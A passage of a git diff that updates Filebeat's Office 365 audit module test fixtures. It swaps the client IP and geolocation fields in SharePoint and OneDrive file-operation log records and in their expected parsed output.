"4803608a-df7d-4f63-aa73-67aa33bb576e", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Version": 1, "Operation": "FileDeleted", "Id": "ec04aa09-0a43-4879-cdc8-08d7abecf327"}
-{"SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:07", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "Version": 1, "SourceRelativeUrl": "Documents", "ItemType": "File", "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "png", "UserType": 0, "EventSource": "SharePoint", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "ClientIP": "213.97.47.133", "CorrelationId": "652b339f-908c-a000-f25f-91423da7dd9b", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SourceFileName": "Screenshot 2020-01-27 at 11.30.48.png", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "RecordType": 6, "ListItemUniqueId": "4803608a-df7d-4f63-aa73-67aa33bb576e", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Operation": "FileDeleted", "Id": "ec04aa09-0a43-4879-cdc8-08d7abecf327"}
-{"SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:08", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "Version": 1, "SourceRelativeUrl": "Documents/Forms", "ItemType": "File", "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "aspx", "UserType": 0, "EventSource": "SharePoint", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "ClientIP": "213.97.47.133", "CorrelationId": "652b339f-90a0-a000-f25f-919afc141eb1", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Forms/All.aspx", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SourceFileName": "All.aspx", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "RecordType": 6, "ListItemUniqueId": "ff3631c1-6189-45c7-ad45-c15cea9e9255", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Operation": "FileAccessed", "Id": "25b08f04-48ee-4755-ce22-08d7abecf3a9"}
-{"SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:08", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "Version": 1, "SourceRelativeUrl": "Documents/Forms", "RecordType": 6, "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "aspx", "UserType": 0, "EventSource": "SharePoint", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "ClientIP": "213.97.47.133", "CorrelationId": "652b339f-90a0-a000-f25f-919afc141eb1", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Forms/All.aspx", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SourceFileName": "All.aspx", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "ItemType": "File", "ListItemUniqueId": "ff3631c1-6189-45c7-ad45-c15cea9e9255", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Operation": "FileAccessed", "Id": "25b08f04-48ee-4755-ce22-08d7abecf3a9"}
-{"SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:21", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "Version": 1, "SourceRelativeUrl": "Documents", "ImplicitShare": "No", "RecordType": 6, "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "png", "UserType": 0, "EventSource": "SharePoint", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "ClientIP": "213.97.47.133", "CorrelationId": "692b339f-c016-a000-f25f-990a07b2e011", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SourceFileName": "Screenshot.png", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "ItemType": "File", "ListItemUniqueId": "7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Operation": "FileUploaded", "Id": "dac93a9f-f2fb-4cac-d18f-08d7abecfbb6"}
-{"SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:23", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "Version": 1, "SourceRelativeUrl": "Documents", "RecordType": 6, "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "png", "UserType": 0, "EventSource": "SharePoint", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "ClientIP": "213.97.47.133", "CorrelationId": "692b339f-902e-a000-f25f-95def5f17903", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SourceFileName": "Screenshot.png", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "ItemType": "File", "ListItemUniqueId": "7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Operation": "FileModified", "Id": "5b02fadb-8eac-4aff-af87-08d7abecfca3"}
-{"SourceRelativeUrl": "Documents", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:07", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "Version": 1, "RecordType": 6, "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "png", "UserType": 0, "EventSource": "SharePoint", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "ClientIP": "213.97.47.133", "CorrelationId": "652b339f-908c-a000-f25f-91423da7dd9b", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "SourceFileName": "Screenshot 2020-01-27 at 11.30.48.png", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "ItemType": "File", "ListItemUniqueId": "4803608a-df7d-4f63-aa73-67aa33bb576e", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Operation": "FileDeleted", "Id": "ec04aa09-0a43-4879-cdc8-08d7abecf327"}
-{"SourceRelativeUrl": "Documents", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:21", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "Version": 1, "ImplicitShare": "No", "ItemType": "File", "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "png", "UserType": 0, "EventSource": "SharePoint", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "ClientIP": "213.97.47.133", "CorrelationId": "692b339f-c016-a000-f25f-990a07b2e011", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "SourceFileName": "Screenshot.png", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "RecordType": 6, "ListItemUniqueId": "7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Operation": "FileUploaded", "Id": "dac93a9f-f2fb-4cac-d18f-08d7abecfbb6"}
-{"SourceRelativeUrl": "Documents", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:23", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "ItemType": "File", "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "png", "UserType": 0, "EventSource": "SharePoint", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "ClientIP": "213.97.47.133", "CorrelationId": "692b339f-902e-a000-f25f-95def5f17903", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SourceFileName": "Screenshot.png", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "RecordType": 6, "ListItemUniqueId": "7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Version": 1, "Operation": "FileModified", "Id": "5b02fadb-8eac-4aff-af87-08d7abecfca3"}
-{"SourceRelativeUrl": "Documents", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:23", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "Version": 1, "ItemType": "File", "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "png", "UserType": 0, "EventSource": "SharePoint", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "ClientIP": "213.97.47.133", "CorrelationId": "692b339f-902e-a000-f25f-95def5f17903", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "SourceFileName": "Screenshot.png", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "RecordType": 6, "ListItemUniqueId": "7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Operation": "FileModified", "Id": "5b02fadb-8eac-4aff-af87-08d7abecfca3"}
-{"SourceRelativeUrl": "Documents", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:23", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "Version": 1, "RecordType": 6, "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "png", "UserType": 0, "EventSource": "SharePoint", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "ClientIP": "213.97.47.133", "CorrelationId": "692b339f-902e-a000-f25f-95def5f17903", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "SourceFileName": "Screenshot.png", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "ItemType": "File", "ListItemUniqueId": "7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Operation": "FileModified", "Id": "5b02fadb-8eac-4aff-af87-08d7abecfca3"}
+{"SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:07", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "SourceRelativeUrl": "Documents", "RecordType": 6, "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "png", "UserType": 0, "EventSource": "SharePoint", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "ClientIP": "81.2.69.143", "CorrelationId": "652b339f-908c-a000-f25f-91423da7dd9b", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SourceFileName": "Screenshot 2020-01-27 at 11.30.48.png", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "ItemType": "File", "ListItemUniqueId": "4803608a-df7d-4f63-aa73-67aa33bb576e", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Version": 1, "Operation": "FileDeleted", "Id": "ec04aa09-0a43-4879-cdc8-08d7abecf327"}
+{"SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:07", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "Version": 1, "SourceRelativeUrl": "Documents", "ItemType": "File", "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "png", "UserType": 0, "EventSource": "SharePoint", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "ClientIP": "81.2.69.143", "CorrelationId": "652b339f-908c-a000-f25f-91423da7dd9b", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SourceFileName": "Screenshot 2020-01-27 at 11.30.48.png", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "RecordType": 6, "ListItemUniqueId": "4803608a-df7d-4f63-aa73-67aa33bb576e", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Operation": "FileDeleted", "Id": "ec04aa09-0a43-4879-cdc8-08d7abecf327"}
+{"SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:08", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "Version": 1, "SourceRelativeUrl": "Documents/Forms", "ItemType": "File", "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "aspx", "UserType": 0, "EventSource": "SharePoint", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "ClientIP": "81.2.69.143", "CorrelationId": "652b339f-90a0-a000-f25f-919afc141eb1", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Forms/All.aspx", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SourceFileName": "All.aspx", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "RecordType": 6, "ListItemUniqueId": "ff3631c1-6189-45c7-ad45-c15cea9e9255", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Operation": "FileAccessed", "Id": "25b08f04-48ee-4755-ce22-08d7abecf3a9"}
+{"SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:08", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "Version": 1, "SourceRelativeUrl": "Documents/Forms", "RecordType": 6, "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "aspx", "UserType": 0, "EventSource": "SharePoint", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "ClientIP": "81.2.69.143", "CorrelationId": "652b339f-90a0-a000-f25f-919afc141eb1", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Forms/All.aspx", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SourceFileName": "All.aspx", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "ItemType": "File", "ListItemUniqueId": "ff3631c1-6189-45c7-ad45-c15cea9e9255", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Operation": "FileAccessed", "Id": "25b08f04-48ee-4755-ce22-08d7abecf3a9"}
+{"SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:21", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "Version": 1, "SourceRelativeUrl": "Documents", "ImplicitShare": "No", "RecordType": 6, "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "png", "UserType": 0, "EventSource": "SharePoint", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "ClientIP": "81.2.69.143", "CorrelationId": "692b339f-c016-a000-f25f-990a07b2e011", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SourceFileName": "Screenshot.png", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "ItemType": "File", "ListItemUniqueId": "7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Operation": "FileUploaded", "Id": "dac93a9f-f2fb-4cac-d18f-08d7abecfbb6"}
+{"SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:23", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "Version": 1, "SourceRelativeUrl": "Documents", "RecordType": 6, "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "png", "UserType": 0, "EventSource": "SharePoint", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "ClientIP": "81.2.69.143", "CorrelationId": "692b339f-902e-a000-f25f-95def5f17903", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SourceFileName": "Screenshot.png", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "ItemType": "File", "ListItemUniqueId": "7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Operation": "FileModified", "Id": "5b02fadb-8eac-4aff-af87-08d7abecfca3"}
+{"SourceRelativeUrl": "Documents", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:07", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "Version": 1, "RecordType": 6, "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "png", "UserType": 0, "EventSource": "SharePoint", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "ClientIP": "81.2.69.143", "CorrelationId": "652b339f-908c-a000-f25f-91423da7dd9b", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "SourceFileName": "Screenshot 2020-01-27 at 11.30.48.png", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "ItemType": "File", "ListItemUniqueId": "4803608a-df7d-4f63-aa73-67aa33bb576e", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Operation": "FileDeleted", "Id": "ec04aa09-0a43-4879-cdc8-08d7abecf327"}
+{"SourceRelativeUrl": "Documents", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:21", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "Version": 1, "ImplicitShare": "No", "ItemType": "File", "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "png", "UserType": 0, "EventSource": "SharePoint", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "ClientIP": "81.2.69.143", "CorrelationId": "692b339f-c016-a000-f25f-990a07b2e011", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "SourceFileName": "Screenshot.png", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "RecordType": 6, "ListItemUniqueId": "7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Operation": "FileUploaded", "Id": "dac93a9f-f2fb-4cac-d18f-08d7abecfbb6"}
+{"SourceRelativeUrl": "Documents", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:23", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "ItemType": "File", "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "png", "UserType": 0, "EventSource": "SharePoint", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "ClientIP": "81.2.69.143", "CorrelationId": "692b339f-902e-a000-f25f-95def5f17903", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SourceFileName": "Screenshot.png", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "RecordType": 6, "ListItemUniqueId": "7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Version": 1, "Operation": "FileModified", "Id": "5b02fadb-8eac-4aff-af87-08d7abecfca3"}
+{"SourceRelativeUrl": "Documents", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:23", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "Version": 1, "ItemType": "File", "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "png", "UserType": 0, "EventSource": "SharePoint", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "ClientIP": "81.2.69.143", "CorrelationId": "692b339f-902e-a000-f25f-95def5f17903", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "SourceFileName": "Screenshot.png", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "RecordType": 6, "ListItemUniqueId": "7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Operation": "FileModified", "Id": "5b02fadb-8eac-4aff-af87-08d7abecfca3"}
+{"SourceRelativeUrl": "Documents", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:23", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "Version": 1, "RecordType": 6, "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "png", "UserType": 0, "EventSource": "SharePoint", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "ClientIP": "81.2.69.143", "CorrelationId": "692b339f-902e-a000-f25f-95def5f17903", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "SourceFileName": "Screenshot.png", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "ItemType": "File", "ListItemUniqueId": "7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Operation": "FileModified", "Id": "5b02fadb-8eac-4aff-af87-08d7abecfca3"}
diff --git a/x-pack/filebeat/module/o365/audit/test/06-sharepointfileop.log-expected.json b/x-pack/filebeat/module/o365/audit/test/06-sharepointfileop.log-expected.json
index 41256959a5c5..df66d37082c2 100644
--- a/x-pack/filebeat/module/o365/audit/test/06-sharepointfileop.log-expected.json
+++ b/x-pack/filebeat/module/o365/audit/test/06-sharepointfileop.log-expected.json
@@ -1,8 +1,8 @@
 [
 {
 "@timestamp": "2020-02-07T16:44:07.000Z",
- "client.address": "213.97.47.133",
- "client.ip": "213.97.47.133",
+ "client.address": "81.2.69.143",
+ "client.ip": "81.2.69.143",
 "event.action": "FileDeleted",
 "event.category": "file",
 "event.code": "SharePointFileOperation",
@@ -22,7 +22,7 @@
 "input.type": "log",
 "log.offset": 0,
 "network.type": "ipv4",
- "o365.audit.ClientIP": "213.97.47.133",
+ "o365.audit.ClientIP": "81.2.69.143",
 "o365.audit.CorrelationId": "652b339f-908c-a000-f25f-91423da7dd9b",
 "o365.audit.CreationTime": "2020-02-07T16:44:07",
 "o365.audit.EventSource": "SharePoint",
@@ -47,20 +47,18 @@
 "o365.audit.WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30",
 "o365.audit.Workload": "OneDrive",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "213.97.47.133",
+ "related.ip": "81.2.69.143",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
+ "source.geo.city_name": "London",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "213.97.47.133",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.143",
 "tags": [
 "forwarded"
 ],
@@ -83,8 +81,8 @@
 },
 {
 "@timestamp": "2020-02-07T16:44:07.000Z",
- "client.address": "213.97.47.133",
- "client.ip": "213.97.47.133",
+ "client.address": "81.2.69.143",
+ "client.ip": "81.2.69.143",
 "event.action": "FileDeleted",
 "event.category": "file",
 "event.code": "SharePointFileOperation",
@@ -102,9 +100,9 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 1130,
+ "log.offset": 1128,
 "network.type": "ipv4",
- "o365.audit.ClientIP": "213.97.47.133",
+ "o365.audit.ClientIP": "81.2.69.143",
 "o365.audit.CorrelationId": "652b339f-908c-a000-f25f-91423da7dd9b",
 "o365.audit.CreationTime": "2020-02-07T16:44:07",
 "o365.audit.EventSource": "SharePoint",
@@ -129,20 +127,18 @@
